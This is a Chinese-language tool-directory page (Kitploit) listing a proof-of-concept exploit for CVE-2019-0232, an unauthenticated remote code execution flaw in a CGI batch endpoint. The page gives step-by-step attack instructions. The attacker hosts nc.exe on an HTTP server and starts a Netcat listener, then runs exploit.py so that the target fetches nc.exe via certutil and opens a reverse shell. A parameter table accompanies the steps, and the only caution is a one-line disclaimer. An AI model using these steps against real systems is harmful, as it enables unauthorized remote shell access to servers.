Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-0232 — 基于 /jaiguptanick/CVE-2019-0232 的漏洞利用 | Kitploit
工具/GitHubGitHub/r4vl1t0/cve-2019-0232
Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubr4vl1t0/cve-2019-0232

CVE-2019-0232

基于 /jaiguptanick/CVE-2019-0232 的漏洞利用

查看仓库
15个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CGI RCE 漏洞利用

通过 CGI 批处理端点实现未认证 RCE 的 PoC。使用 certutil 将 nc.exe 下载到目标主机,并触发反弹 shell。

设置

1. 托管 nc.exe(在 nc.exe 所在的同一目录下):

root@kitploit:~
python3 -m http.server 80

2. 启动你的监听器:

root@kitploit:~
nc -lvnp 1234

3. 运行漏洞利用程序:

root@kitploit:~
python3 exploit.py \
  --url http://:/cgi/.bat \
  --server-ip  \
  --server-port 80 \
  --nc-ip  \
  --nc-port 1234

参数

参数必需默认值描述
--url✅—包含 CGI 端点的完整目标 URL
--server-ip✅—你的 IP,用于通过 HTTP 托管 nc.exe
--server-port❌80HTTP 服务器的端口
--nc-ip✅—你的 Netcat 监听器 IP
--nc-port✅—你的 Netcat 监听器端口

免责声明

仅供授权的渗透测试和教育目的使用。

下载工具